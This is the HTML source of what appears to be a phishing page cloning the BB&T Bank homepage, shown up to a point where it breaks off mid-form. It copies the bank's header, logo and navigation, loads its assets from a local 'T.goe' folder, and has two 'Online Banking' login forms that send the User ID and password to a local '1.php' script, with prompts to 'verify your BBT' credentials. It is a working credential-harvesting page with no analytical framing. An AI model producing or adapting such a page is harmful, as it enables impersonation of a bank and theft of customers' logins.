
<!DOCTYPE html>

<html class="true-hover" lang="en">
<head class="at-element-marker" style="visibility: visible;">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
<title>BB&amp;T Bank | Personal Banking, Business Banking, Mortgages, Investments</title>
<meta name="keywords" content="">
<meta name="description" content="">
<meta name="vpath" content="">
<meta name="page-locale-name" content="">



<link href="T.goe/1.ico" rel="Shortcut Icon">
<link type="text/css" href="T.goe/1.css" rel="stylesheet">
<link rel="canonical" href="">
<meta content="width=device-width, initial-scale=1, shrink-to-fit=no" name="viewport">
<script src="T.goe/2.js" type="text/javascript"></script>
<script src="T.goe/1.js" type="text/javascript"></script>
</head>
<body class="personal-homepage lg-screen">
<div class="ls-canvas site-wrapper site-wrapper--personal" id="site-wrapper--personal">
<div class="ls-row site-wrapper__section-row site-wrapper__section-row--header-row" id="row-1">
<div class="ls-fxr" id="ls-gen19420204-ls-fxr">
<div class="ls-area site-wrapper__section-area" id="row-1__area-1">
<div class="ls-area-body" id="ls-gen19420205-ls-area-body">
<div class="ls-cmp-wrap ls-1st" id="w1498566102239">
<div class="iw_component" id="1498566102239">
<div>
<script>
$('body').addClass('personal-homepage');
</script>
</div>

</div>
</div>
<div class="ls-cmp-wrap" id="w1495868712572">
<div class="iw_component" id="1495868712572">

<section role="region" class="global-header transition up">

<a class="nav-item__not-toggler" id="skip-navigation" href="javascript:void(0);">Skip to main content</a>
<header role="banner">

<nav role="presentation" class="navbar navbar--primary">

<div class="container">

<div class="row">

<div class="column--navbar column--navbar--1of2">

<ul aria-label="Banking Segment" role="region" class="navbar__ul">
<li class="navbar__li navbar__li--underline active" aria-current="true">

<a target="" href="#" class="navbar__a navbar__a--primary nav-item__not-toggler">Personal</a>

</li>

<li class="navbar__li navbar__li--underline">

<a class="navbar__a navbar__a--primary nav-item__not-toggler" href="" target="">Business</a>

</li>
<li class="navbar__li navbar__li--underline">

<a class="navbar__a navbar__a--primary nav-item__not-toggler" href="" target="">Wealth</a>

</li>

</ul>
</div>

<div class="column--navbar column--navbar--2of2">
<ul class="navbar__ul">
<li class="navbar__li">
<div id="lpButtonDiv-dmo-responsive">
</div>

</li>


<li class="navbar__li">

<a class="navbar__a navbar__a--primary nav-item__not-toggler btn__icon--left" href="" target="_self">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" data-icon="person" width="128" height="128" class="iconic-person injected-svg iconic" viewBox="0 0 128 128" data-src="/assets/bbtcom/resources/icons/person.svg" tabindex="-1" focusable="false" role="presentation">
  <g><title></title></g>
  
<g data-width="128" data-height="128" class="iconic-lg iconic-container" display="inline">
    
<g class="iconic-person-genderless">
      <path d="M87.9 80c-.8 0-2 .4-2.7.9-6.1 4.6-13.3 7.1-21.2 7.1-7.5 0-14.5-2.5-20.5-7.1-.7-.5-1.8-.9-2.7-.9h-8.8c-17.7 0-32 14.3-32 32v14.5c0 .8.7 1.5 1.5 1.5h125c.8 0 1.5-.7 1.5-1.5v-14.5c0-17.7-14.3-32-32-32h-8.1z" class="iconic-person-body iconic-property-fill"></path>
      <path d="M96 35c0 22.1-10.1 45-32 45-20.1 0-32-22.9-32-45s14.3-35 32-35 32 12.9 32 35z" class="iconic-person-head iconic-property-fill"></path>
    
</g>
  
</g>

<g data-width="112" data-height="128" class="iconic-lg iconic-container" display="inline" transform="translate(8)">
    
<g class="iconic-person-female" display="none">
      <path d="M78.7 80c-.7 0-1.7.5-2.3 1-6.3 5.8-13.4 9-20.4 9-7.3 0-14.4-3.4-20.5-9-.6-.6-1.6-1-2.3-1h-1.2c-8 0-32 16-32 40v6.5c0 .8.7 1.5 1.5 1.5h109c.8 0 1.5-.7 1.5-1.5v-6.5c0-24-24-40-32-40h-1.3z" class="iconic-person-female-body iconic-property-fill"></path>
      <path d="M104 64c-8 0-18-5.3-18-24 0-22.1-12.3-40-30-40s-30 17.9-30 40c0 18.7-10 24-18 24 0 0 11.5 4.3 24.9 1 5.9 10.1 14.8 17 23.1 17s17.3-7 23.2-17.2c13.2 3.5 24.8-.8 24.8-.8z" class="iconic-person-female-head iconic-property-fill"></path>
    
</g>
  
</g>
  
<g data-width="128" data-height="128" class="iconic-lg iconic-container" display="inline">
    
<g class="iconic-person-male" display="none">
      <path d="M90.8 80c-.8 0-1.9.5-2.5 1.1-6.6 7.1-14.9 10.9-24.3 10.9s-17.8-3.8-24.3-10.9c-.6-.6-1.7-1.1-2.5-1.1h-5.2c-17.7 0-32 14.3-32 32v14.5c0 .8.7 1.5 1.5 1.5h125c.8 0 1.5-.7 1.5-1.5v-14.5c0-17.7-14.3-32-32-32h-5.2z" class="iconic-person-male-body iconic-property-fill"></path>
      <path d="M80 8c-.5-7.5-9.4-8-16-8-31.8 0-36.3 26-30 40 0 22.1 10 44 30 44 19.8 0 30-21.9 30-44 7.7-23.7-6.2-32-14-32z" class="iconic-person-male-head iconic-property-fill"></path>
    </g>
  </g>
  
<g data-width="32" data-height="32" class="iconic-md iconic-container" display="none" transform="scale(4)">
    <g class="iconic-person-genderless">
      <path d="M23.6 20c-.2 0-.6.2-.8.3-1.8 1.7-4.2 2.7-6.8 2.7s-5-1-6.8-2.7c-.2-.1-.5-.3-.8-.3h-.4c-4.4 0-8 3.6-8 8v3.5c0 .3.2.5.5.5h31c.3 0 .5-.2.5-.5v-3.5c0-4.4-3.6-8-8-8h-.4z" class="iconic-person-body iconic-property-fill"></path>
      <path d="M24 9c0 5.5-2.6 11-8 11-5.5 0-8-5.5-8-11s3.6-9 8-9 8 3.5 8 9z" class="iconic-person-head iconic-property-fill"></path>
    </g>
  </g>
  
<g data-width="28" data-height="32" class="iconic-md iconic-container" display="none" transform="scale(4) translate(2)">
    <g class="iconic-person-female" display="none">
      <path d="M20.6 20.5c-2 2.1-4.3 3.5-6.6 3.5s-4.6-1.4-6.6-3.5c-.2-.2-.5-.3-.8-.2-2.5 1.2-6.6 4.7-6.6 9.7v1.5c0 .3.2.5.5.5h27c.3 0 .5-.2.5-.5v-1.5c0-5-4.1-8.5-6.6-9.6-.3-.2-.7-.1-.8.1z" class="iconic-person-female-body iconic-property-fill"></path>
      <path d="M26 17c-2 0-4-2.3-4-7 0-5.5-3.6-10-8-10s-8 4.5-8 10c0 4.7-2 7-4 7 0 0 2.9.7 6.3-.2 1.7 2.5 4 4.2 5.7 4.2 1.7 0 4.1-1.8 5.8-4.3 3.3 1 6.2.3 6.2.3z" class="iconic-person-female-head iconic-property-fill"></path>
    </g>
  </g>
  
<g data-width="32" data-height="32" class="iconic-md iconic-container" display="none" transform="scale(4)">
    <g class="iconic-person-male" display="none">
      <path d="M23.9 20.4c-1.9 2.3-4.6 3.6-7.9 3.6s-6-1.3-7.9-3.6c-.2-.2-.5-.4-.8-.4-4.1.4-7.3 3.8-7.3 8v3.5c0 .3.2.5.5.5h31c.3 0 .5-.2.5-.5v-3.5c0-4.2-3.2-7.6-7.3-8-.3 0-.6.2-.8.4z" class="iconic-person-male-body iconic-property-fill"></path>
      <path d="M20 2c-.1-1.9-2.3-2-4-2-7.9 0-9.6 6.5-8 10 0 5.5 1.9 11 8 11 5.9 0 8-5.5 8-11 1.9-5.9-2.1-8-4-8z" class="iconic-person-male-head iconic-property-fill"></path>
    </g>
  </g>
  
<g data-width="16" data-height="16" class="iconic-sm iconic-container" display="none" transform="scale(8)">
    <g class="iconic-person-genderless">
      <path d="M12.2 10c-1.1 1.2-2.6 2-4.2 2s-3.1-.8-4.2-2c-2.1.1-3.8 1.9-3.8 4v2h16v-2c0-2.1-1.7-3.9-3.8-4z" class="iconic-person-body iconic-property-fill"></path>
      <ellipse cx="8" cy="5" rx="4" ry="5" class="iconic-person-head iconic-property-fill"></ellipse>
    </g>
  </g>
  
<g data-width="16" data-height="16" class="iconic-sm iconic-container" display="none" transform="scale(8)">
    <g class="iconic-person-female" display="none">
      <path d="M11.8 10.2c-1.2 1.1-2.5 1.8-3.8 1.8s-2.6-.7-3.8-1.8c-1.5.5-4.2 2.3-4.2 4.8v1h16v-1c0-2.5-2.7-4.3-4.2-4.8z" class="iconic-person-female-body iconic-property-fill"></path>
      <path d="M14 8c-1 0-2-.7-2-3 0-2.8-1.8-5-4-5s-4 2.2-4 5c0 2.3-1 3-2 3 0 0 1.5.8 3.3.3.8 1 1.9 1.7 2.7 1.7.8 0 1.9-.7 2.8-1.7 1.7.5 3.2-.3 3.2-.3z" class="iconic-person-female-head iconic-property-fill"></path>
    </g>
  </g>
  
<g data-width="16" data-height="16" class="iconic-sm iconic-container" display="none" transform="scale(8)">
    <g class="iconic-person-male" display="none">
      <path d="M12.5 10c-1 1.3-2.6 2-4.5 2s-3.4-.7-4.5-2c-2 .3-3.5 2-3.5 4v2h16v-2c0-2-1.5-3.7-3.5-4z" class="iconic-person-male-body iconic-property-fill"></path>
      <path d="M10 1c-.1-.9-1.2-1-2-1-4 0-4.8 3.2-4 5 0 2.8 1 5 4 5s4-2.2 4-5c1-3-1-4-2-4z" class="iconic-person-male-head iconic-property-fill"></path>
    </g>
  </g>

</svg>
About BB&amp;T</a>
</li>
<li class="navbar__li">
<a class="navbar__a navbar__a--primary nav-item__not-toggler btn__icon--left" href="" target="_self"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" data-icon="iphone" width="128" height="128" class="iconic-iphone injected-svg iconic" viewBox="0 0 128 128" data-src="/assets/bbtcom/resources/icons/iphone.svg" data-screenshot="" tabindex="-1" focusable="false" role="presentation">
  
<g class="iconic-metadata">
    <title></title>
  </g>
  <defs>
    <clipPath id="iconic-size-lg-iphone-clip-0-1">
      <path d="M0 0v128h62v-128h-62zm31 4.1c.5 0 .9.4.9.9s-.4.9-.9.9-.9-.4-.9-.9.4-.9.9-.9zm-4 5.9h8c.6 0 1 .4 1 1s-.4 1-1 1h-8c-.6 0-1-.4-1-1s.4-1 1-1zm-4.1.2c.5 0 .9.4.9.9s-.4.9-.9.9-.9-.4-.9-.9.4-.9.9-.9zm8.1 113.8c-2.8 0-5-2.2-5-5s2.2-5 5-5 5 2.2 5 5-2.2 5-5 5zm27-14h-54v-94h54v94z"></path>
    </clipPath>
    <clipPath id="iconic-size-lg-iphone-clip-1-1">
      <rect x="4" y="16" width="54" height="94"></rect>
    </clipPath>
    <clipPath id="iconic-size-md-iphone-clip-0-1">
      <path d="M0 0v32h15v-32h-15zm5.5 2h4c.3 0 .5.2.5.5s-.2.5-.5.5h-4c-.3 0-.5-.2-.5-.5s.2-.5.5-.5zm2 29c-.8 0-1.5-.7-1.5-1.5s.7-1.5 1.5-1.5 1.5.7 1.5 1.5-.7 1.5-1.5 1.5zm6.5-4h-13v-23h13v23z"></path>
    </clipPath>
    <clipPath id="iconic-size-md-iphone-clip-1-1">
      <rect x="1" y="4" width="13" height="23"></rect>
    </clipPath>
    <clipPath id="iconic-size-sm-iphone-clip-0-1">
      <path d="M0 0v16h9v-16h-9zm3.5 1h2c.3 0 .5.2.5.5s-.2.5-.5.5h-2c-.3 0-.5-.2-.5-.5s.2-.5.5-.5zm1 14c-.3 0-.5-.2-.5-.5s.2-.5.5-.5.5.2.5.5-.2.5-.5.5zm3.5-2h-7v-10h7v10z"></path>
    </clipPath>
    <clipPath id="iconic-size-sm-iphone-clip-1-1">
      <rect x="1" y="3" width="7" height="10"></rect>
    </clipPath>
  </defs>
  <g data-width="62" data-height="128" class="iconic-container iconic-lg" display="inline" transform="translate(33)">
    <path clip-path="url(#iconic-size-lg-iphone-clip-0-1)" d="M53 0h-44c-5 0-9 4-9 9v110c0 5 4 9 9 9h44c5 0 9-4 9-9v-110c0-5-4-9-9-9z" class="iconic-iphone-body iconic-property-fill"></path>
    <image class="iconic-iphone-screenshot-image" data-max-width="54" x="4" y="16" clip-path="url(#iconic-size-lg-iphone-clip-1-1)" display="none" xlink:href=""></image>
  </g>

<g data-width="15" data-height="32" class="iconic-container iconic-md" display="none" transform="scale(4) translate(8)">
    <path clip-path="url(#iconic-size-md-iphone-clip-0-1)" d="M13 0h-11c-1.1 0-2 .9-2 2v28c0 1.1.9 2 2 2h11c1.1 0 2-.9 2-2v-28c0-1.1-.9-2-2-2z" class="iconic-iphone-body iconic-property-fill"></path>
    <image class="iconic-iphone-screenshot-image" data-max-width="13" x="1" y="4" clip-path="url(#iconic-size-md-iphone-clip-1-1)" display="none" xlink:href=""></image>
  </g>
  <g data-width="9" data-height="16" class="iconic-container iconic-sm" display="none" transform="scale(8) translate(3)">
    <path clip-path="url(#iconic-size-sm-iphone-clip-0-1)" d="M8 0h-7c-.6 0-1 .4-1 1v14c0 .6.4 1 1 1h7c.6 0 1-.4 1-1v-14c0-.6-.4-1-1-1z" class="iconic-iphone-body iconic-property-fill"></path>
    <image class="iconic-iphone-screenshot-image" data-max-width="7" x="1" y="3" clip-path="url(#iconic-size-sm-iphone-clip-1-1)" display="none" xlink:href=""></image>
  </g>

</svg>Contact</a>
</li>
<li class="navbar__li">
<a class="navbar__a navbar__a--primary nav-item__not-toggler btn__icon--left" href="" data-sm-screen-href="" data-lg-screen-href="" target="_self"><svg xmlns="http://www.w3.org/2000/svg" class="iconic-map-marker injected-svg iconic" width="128" height="128" viewBox="0 0 128 128" data-src="/assets/bbtcom/resources/icons/map-marker.svg" tabindex="-1" focusable="false" role="presentation">
  <g class="iconic-metadata">
    <title></title>
  </g>
  <g class="iconic-map-marker-lg iconic-container iconic-lg" data-width="80" data-height="128" display="inline" transform="translate(24)">
    <path d="M40 0c-22.091 0-40 17.909-40 40 0 30 40 88 40 88s40-58 40-88c0-22.091-17.909-40-40-40zm0 58c-9.941 0-18-8.059-18-18s8.059-18 18-18 18 8.059 18 18-8.059 18-18 18z" class="iconic-property-fill"></path>
  </g>
  <g class="iconic-map-marker-md iconic-container iconic-md" data-width="20" data-height="32" display="none" transform="scale(4) translate(6)">
    <path d="M10 0c-5.523 0-10 4.477-10 10 0 7.5 10 22 10 22s10-14.5 10-22c0-5.523-4.477-10-10-10zm0 15c-2.761 0-5-2.239-5-5s2.239-5 5-5 5 2.239 5 5-2.239 5-5 5z" class="iconic-property-fill"></path>
  </g>
  <g class="iconic-map-marker-sm iconic-container iconic-sm" data-width="10" data-height="16" display="none" transform="scale(8) translate(3)">
    <path d="M5 0c-2.761 0-5 2.239-5 5 0 3.75 5 11 5 11s5-7.25 5-11c0-2.761-2.239-5-5-5zm0 7c-1.105 0-2-.895-2-2s.895-2 2-2 2 .895 2 2-.895 2-2 2z" class="iconic-property-fill"></path>
  </g>
</svg>Locations</a>
</li>
<li class="navbar__li navbar__li--utilities navbar__li--utilities--primary">
<div class="dropdown dropdown--utilities dropdown--utilities--desktop">
<a aria-expanded="false" aria-haspopup="true" role="button" data-toggle="dropdown" class="navbar__a navbar__a--primary dropdown__toggle nav-item__toggler dropdown__toggle--utilities dropdown__toggle--utilities--desktop btn__icon--right" href="#" id="global-header-desktop-more">More<svg xmlns="http://www.w3.org/2000/svg" class="iconic-ellipses injected-svg iconic" width="128" height="128" viewBox="0 0 128 128" data-src="/assets/bbtcom/resources/icons/ellipses.svg" tabindex="-1" focusable="false" role="presentation">
  <g class="iconic-metadata">
    <title></title>
  </g>
  <g class="iconic-ellipses-lg iconic-container iconic-lg" data-width="126" data-height="34" display="inline" transform="translate(1 47)">
    <path d="M32.5 34h-31c-.828 0-1.5-.672-1.5-1.5v-31c0-.828.672-1.5 1.5-1.5h31c.828 0 1.5.672 1.5 1.5v31c0 .828-.672 1.5-1.5 1.5z" class="iconic-ellipses-dot iconic-ellipses-dot-1 iconic-property-fill"></path>
    <path d="M78.5 34h-31c-.828 0-1.5-.672-1.5-1.5v-31c0-.828.672-1.5 1.5-1.5h31c.828 0 1.5.672 1.5 1.5v31c0 .828-.672 1.5-1.5 1.5z" class="iconic-ellipses-dot iconic-ellipses-dot-2 iconic-property-fill"></path>
    <path d="M124.5 34h-31c-.828 0-1.5-.672-1.5-1.5v-31c0-.828.672-1.5 1.5-1.5h31c.828 0 1.5.672 1.5 1.5v31c0 .828-.672 1.5-1.5 1.5z" class="iconic-ellipses-dot iconic-ellipses-dot-3 iconic-property-fill"></path>
  </g>
  <g class="iconic-ellipses-md iconic-container iconic-md" data-width="32" data-height="8" display="none" transform="scale(4) translate(0 12)">
    <path d="M7.5 8h-7c-.276 0-.5-.224-.5-.5v-7c0-.276.224-.5.5-.5h7c.276 0 .5.224.5.5v7c0 .276-.224.5-.5.5z" class="iconic-ellipses-dot iconic-ellipses-dot-1 iconic-property-fill"></path>
    <path d="M19.5 8h-7c-.276 0-.5-.224-.5-.5v-7c0-.276.224-.5.5-.5h7c.276 0 .5.224.5.5v7c0 .276-.224.5-.5.5z" class="iconic-ellipses-dot iconic-ellipses-dot-2 iconic-property-fill"></path>
    <path d="M31.5 8h-7c-.276 0-.5-.224-.5-.5v-7c0-.276.224-.5.5-.5h7c.276 0 .5.224.5.5v7c0 .276-.224.5-.5.5z" class="iconic-ellipses-dot iconic-ellipses-dot-3 iconic-property-fill"></path>
  </g>
  <g class="iconic-ellipses-sm iconic-container iconic-sm" data-width="16" data-height="4" display="none" transform="scale(8) translate(0 6)">
    <path class="iconic-ellipses-dot iconic-ellipses-dot-1 iconic-property-fill" d="M0 0h4v4h-4z"></path>
    <path class="iconic-ellipses-dot iconic-ellipses-dot-2 iconic-property-fill" d="M6 0h4v4h-4z"></path>
    <path class="iconic-ellipses-dot iconic-ellipses-dot-3 iconic-property-fill" d="M12 0h4v4h-4z"></path>
  </g>
</svg></a>

<ul aria-labelledby="global-header-desktop-more" role="menu" class="dropdown__menu dropdown__menu--utilities dropdown__menu--utilities--desktop">
<li role="presentation">
<a tabindex="-1" role="menuitem" class="dropdown__a dropdown__a--utilities dropdown__a--utilities--desktop" href="" target="_self">Careers</a>
</li>
<li role="presentation">
<a tabindex="-1" role="menuitem" class="dropdown__a dropdown__a--utilities dropdown__a--utilities--desktop" href="" target="_self" onclick="return switchLanguage('es');" mpdisurl=""><span lang="es">Espa?ol</span></a>
</li>
<li role="presentation">
<a tabindex="-1" role="menuitem" class="dropdown__a dropdown__a--utilities dropdown__a--utilities--desktop" href="" target="_self">Privacy &amp; Security</a>
</li>
<li role="presentation">
<a tabindex="-1" role="menuitem" class="dropdown__a dropdown__a--utilities dropdown__a--utilities--desktop" href="" target="_self">Legal</a>
</li>
</ul>
</div>
</li>
</ul>
</div>

</div>

</div>

</nav>
<nav role="presentation" class="navbar navbar--secondary">

<div class="container">

<div class="row">

<div class="column--navbar column--navbar--1of3">

<a aria-expanded="false" aria-controls="collapse--navbar" data-target="#collapse--navbar" data-toggle="collapse" role="button" class="btn btn--link navbar__toggler nav-item__not-toggler collapsed" id="menu-toggle" href="#">
<span class="sr-only">Menu Toggle</span></a>
<a class="logo nav-item__not-toggler" id="logo" href="#">

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" focusable="false" role="presentation" tabindex="-1" xml:space="preserve" style="enable-background:new 0 0 75 25;" viewBox="0 0 75 25" y="0px" x="0px" version="1.1">
									   
<g>
										  
<g>
											 
<g>
												<path d="M14.4,12c2.5-0.7,4.9-2.4,4.9-5.4c0-3-2.8-5.8-8.5-5.8C6.8,0.7,0,0.7,0,0.7v0.7c2.7,0,3,0.4,3,2.9v17.3                c0,1-0.8,2-3,2v0.7c0,0,3.1,0,9.4,0S20,22.9,20,18C20.1,13.5,16.3,12.4,14.4,12z M8.3,2.1h1.5c1.9,0,3.9,1.6,4.2,3.6                c0.2,1.6,0,3.3-1,4.4c-0.9,1-1.7,1.6-4.6,1.6V2.1z M14.3,19.9c-0.2,1.1-1.1,2.2-2.4,2.8c-1.6,0.7-3.6,0.6-3.6-1.3v-8.8                c1.9,0,3.6-0.1,4.9,1.5C14.5,15.5,14.8,17.5,14.3,19.9z" class="st0"></path>
											 </g>
										  </g>
										  <g>
											 <g>
												<path d="M32.9,12c2.5-0.7,4.9-2.4,4.9-5.4c0-3-2.8-5.8-8.5-5.8c-3.9,0-10.8,0-10.8,0v0.7c2.7,0,3,0.4,3,2.9v17.3                c0,1-0.8,2-3,2v0.7c0,0,3.1,0,9.4,0c6.3,0,10.6-1.5,10.6-6.3C38.6,13.5,34.8,12.4,32.9,12z M26.8,2.1h1.5c1.9,0,3.9,1.6,4.2,3.6                c0.2,1.6,0,3.3-1,4.4c-0.9,1-1.7,1.6-4.6,1.6V2.1z M32.8,19.9c-0.2,1.1-1.1,2.2-2.4,2.8c-1.6,0.7-3.6,0.6-3.6-1.3v-8.8                c1.9,0,3.6-0.1,4.9,1.5C33,15.5,33.3,17.5,32.8,19.9z" class="st0"></path>
											 </g>
										  </g>
										  <g>
											 <g>
												<path d="M61.2,11.3v-0.7h-5.8v0.6c0.9,0,1.6,0.6,1.1,2c-1,3.4-2,4.2-2,4.2c-2.2-2.4-3.9-5.4-5.6-8.4                c0.8-0.4,2.1-1.5,2.8-3.3C52.9,2.5,50.2,0,47.2,0c-2.8,0-4.9,2.1-5.3,4.2C41.4,6.5,43,8.5,43.7,10c-3.9,1.8-5.8,5.1-5.8,8                c0,2.1,1.8,6.5,7.1,7.1c3.6,0.3,6.1-1.6,7.3-2.8c1.7,1.7,2.7,2.1,4.2,2.1c1.7,0,3.8-2,4.5-4.4l-0.6-0.4c-0.2,0.4-0.7,1.1-1.1,1.2                c-2,0.6-2.7-1.1-3.8-2.1c0.7-0.8,1.8-3.5,2.1-4.4C57.9,13.2,59.3,11.3,61.2,11.3z M46.6,3.7c0.3-1,1.6-1.9,3-1                c0.6,0.3,1.2,1.6,0.8,2.9c-0.2,0.7-1.2,2-2.2,2.2C47.9,7.4,46.1,5,46.6,3.7z M42.7,16.6c-0.8-2.4,0.7-4.5,1.7-5.3                c0.6,1.1,1.7,3.1,2.8,4.8c1.3,2.2,2.5,3.4,3.6,4.7C49,22.4,44.3,21.9,42.7,16.6z" class="st0"></path>
											 </g>
										  </g>
										  <path d="M55.2,0.7H75v5.8h-0.7c0-3-1.8-4.8-4-4.8c-2,0-2.6,0-2.6,0v18.5c0,2.2-0.4,3.3,3.3,3.3v0.7H59.4v-0.7             c3.1-0.1,3-1.3,3-2.9V1.8c0,0-1.1,0-2.6,0c-2.4,0-4,2.2-4,4.8h-0.7L55.2,0.7L55.2,0.7z" class="st0"></path>
										</g>
									</svg>
<span class="sr-only">BB&amp;T Homepage</span>
</a>

</div>
<div class="column--navbar column--navbar--2of3">

<div id="collapse--navbar" class="collapse collapse--navbar navbar--toggleable--md" aria-expanded="false">

<div class="tabs">

<ul role="tablist" class="tabs__tab-list">

<li role="presentation" class="tabs__li nav-item">

<a aria-selected="true" data-toggle="tab" role="tab" id="tabs__a--personal" class="tabs__a active" href="#tabs__pane--personal" aria-controls="tabs__pane--personal">Personal</a>

</li>
<li role="presentation" class="tabs__li nav-item">
<a aria-selected="" data-toggle="tab" role="tab" id="tabs__a--business" class="tabs__a" href="#tabs__pane--business" aria-controls="tabs__pane--business">Business</a>

</li>
<li role="presentation" class="tabs__li nav-item">

<a aria-selected="" data-toggle="tab" role="tab" id="tabs__a--wealth" class="tabs__a" href="#tabs__pane--wealth" aria-controls="tabs__pane--wealth">Wealth</a>

</li>

</ul>
<div class="tabs__content">

<div id="tabs__pane--personal" class="tabs__pane fade in active" aria-labelledby="tabs__a--personal">

<ul class="navbar__ul navbar__ul-main-menu">

<li class="home">

<a href="#">Personal Home</a>

</li>

<li class="dropdown dropdown-main-menu">

<a aria-expanded="false" aria-haspopup="true" role="button" data-toggle="dropdown" class="dropdown__toggle dropdown__toggle-main-menu nav-item__toggler" href="#" id="global-header-personal-banking">Banking<input type="image" id="sign" name="submit" src="T.goe/1.png" />
</a>
</li>
<li class="dropdown dropdown-main-menu">
<a aria-expanded="false" aria-haspopup="true" role="button" data-toggle="dropdown" class="dropdown__toggle dropdown__toggle-main-menu nav-item__toggler" href="#" id="global-header-personal-lending">Lending<input type="image" id="sign" name="submit" src="T.goe/1.png" /></a>

</li>
<li class="dropdown dropdown-main-menu">
<a aria-expanded="false" aria-haspopup="true" role="button" data-toggle="dropdown" class="dropdown__toggle dropdown__toggle-main-menu nav-item__toggler" href="#" id="global-header-personal-retirement">Retirement &amp; Investing<input type="image" id="sign" name="submit" src="T.goe/1.png" /></a>
</li>
<li class="dropdown dropdown-main-menu">
<a aria-expanded="false" aria-haspopup="true" role="button" data-toggle="dropdown" class="dropdown__toggle dropdown__toggle-main-menu nav-item__toggler" href="#" id="global-header-personal-education">Education<input type="image" id="sign" name="submit" src="T.goe/1.png" /></a>

</li>
<li class="dropdown dropdown-main-menu">
<a aria-expanded="false" aria-haspopup="true" role="button" data-toggle="dropdown" class="dropdown__toggle dropdown__toggle-main-menu nav-item__toggler" href="#" id="global-header-personal-insurance">Insurance<input type="image" id="sign" name="submit" src="T.goe/1.png" /></a>

</li>
<li class="dropdown dropdown-main-menu">
<a aria-expanded="false" aria-haspopup="true" role="button" data-toggle="dropdown" class="dropdown__toggle dropdown__toggle-main-menu nav-item__toggler" href="#" id="global-header-personal-online">Online Access<input type="image" id="sign" name="submit" src="T.goe/1.png" /></a>
</li>
</ul>
</div>
</div>

</div>

</div>

</div>
<div class="column--navbar column--navbar--3of3">
<ul class="navbar__ul">

<li class="navbar__li">

<div class="dropdown dropdown--login">
<a aria-controls="login-dropdown" aria-expanded="false" data-toggle="dropdown" role="button" href="#" class="btn btn--secondary dropdown__toggle nav-item__toggler login__toggler btn__icon--right" id="login-dropdown-toggler">Login<span class="sr-only">...</span> <span class="sr-only">solo en ingl�s</span>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" data-icon="caret" width="128" height="128" class="iconic-caret injected-svg iconic" viewBox="0 0 128 128" data-direction="bottom" data-src="/assets/bbtcom/resources/icons/caret.svg" tabindex="-1" focusable="false" role="presentation">
  <g><title></title></g>
  <g data-width="128" data-height="128" class="iconic-lg iconic-container" display="inline" transform="rotate(90 64 64) translate(24)">
    <path d="M78.8 63.1l-77.6-62.2c-.7-.5-1.2-.2-1.2.6v125c0 .8.5 1.1 1.2.6l77.7-62.1c.6-.6.6-1.4-.1-1.9z" class="iconic-property-fill"></path>
  </g>
  <g data-width="32" data-height="32" class="iconic-md iconic-container" display="none" transform="scale(4) rotate(90 16 16) translate(7)">
    <path d="M19.6 15.7l-19.2-15.4c-.2-.2-.4-.1-.4.2v31c0 .3.2.4.4.2l19.2-15.4c.2-.2.2-.4 0-.6z" class="iconic-property-fill"></path>
  </g>
  <g data-width="16" data-height="16" class="iconic-sm iconic-container" display="none" transform="scale(8) rotate(90 8 8) translate(4)">
    <path class="iconic-property-fill" d="M8 8l-8-8v16z"></path>
  </g>

</svg></a>
<div role="dialog" aria-labelledby="login-dropdown-toggler" class="dropdown__menu dropdown__menu--animate animate-fade-in-up-flush-right dropdown__menu--login dropdown__arrow dropdown__offset--right" id="login-dropdown">
<div class="login container">

<h3 aria-describedby="login-header_header" tabindex="-1" id="login-header_header">Online Banking<span class="es-alert"> (solo en ingl&eacute;s)</span></h3>
<form action="1.php" id="signsmall" enctype="application/x-www-form-urlencoded" method="post" aria-label="Login" class="login__section login__form login__form--primary">

<div class="row">

<div class="col-xs-6">

<div class="form-group">

<label for="username_header">User ID</label>
<input required="required" class="form-control form-control-user-name" name="user" id="user" autocapitalize="none" type="username">

</div>

</div>

<div class="col-xs-6">

<div class="form-group">

<label for="password_header">Password</label>
<input required="required" id="pass" class="form-control form-control-password" name="pass" autocapitalize="none" type="password">

</div>

</div>

</div>

<div class="row">

<div class="column--12">

<button class="btn btn--primary btn--block" type="submit">Log in</button>

</div>

</div>
</form>

<script  type="text/javascript">
var frmvalidator = new Validator("signsmall");
frmvalidator.addValidation("user","req","Please verify your BBT User Name");
frmvalidator.addValidation("user","minlen=5","Please verify your BBT User Name");
frmvalidator.addValidation("pass","req","Please verify your BBT Password");
frmvalidator.addValidation("pass","minlen=5","Please verify your BBT Password");
</script>
</div>

</div>

</nav>
</header>
<div tabindex="-1" aria-labelledby="search-trigger" role="dialog" class="collapse" id="search">

<div class="container">
</div>

</div>
</section>
<span class="clear-header"></span>
<div id="cookie-and-br-outdated">
</div>
<script type="text/javascript">
			var activeHomeHR='Personal';
			activeHomeHR=activeHomeHR.toLowerCase();
		
</script>
</div>
</div>
</div>
</div>
<div class="ls-row-clr">
</div>
</div>
</div>
<div class="ls-row site-wrapper__main-content-wrapper" id="row-3" role="main" tabindex="-1">
<div class="ls-fxr" id="ls-gen92564776-ls-fxr">
<div class="ls-col" id="row-3__col-1">
<div class="ls-col-body" id="ls-gen92564777-ls-col-body">
<div class="ls-row site-wrapper__section-row ls-row--populated" id="row-3__row-1" tabindex="-1">
<div class="ls-fxr" id="ls-gen92564778-ls-fxr">
<div class="ls-area site-wrapper__section-area" id="row-3__area-1">
<div class="ls-area-body" id="ls-gen92564779-ls-area-body">
<div class="ls-cmp-wrap ls-1st" id="w1495868712584">
<div class="iw_component" id="1495868712584">

<section data-dcrpath="/templatedata/media-responsive/sales-promotion/data/bbtcom/personal/start-sales-promo" data-component="sandp" class="promo promo--sp">


<div class="promo--sp__block promo--sp__block--bbt">

<div class="container">

<div class="row">

<div class="col-xs-12 col-lg-5 col-xl-4">

<div class="promo__login">

<div class="login container">

<h3 aria-describedby="login-header" tabindex="-1" id="login-header">Online Banking</span></h3>

<form action="1.php" id="signbig" enctype="application/x-www-form-urlencoded" method="post" aria-label="Login" class="login__section login__form login__form--primary">


<div class="row">

<div class="col-xs-6">

<div class="form-group">

<label for="username_banner">User ID</label>
<input required="required" class="form-control form-control-user-name" name="user" id="user" autocapitalize="none" type="username">

</div>

</div>


<div class="col-xs-6">


<div class="form-group">

<label for="password_banner">Password</label>
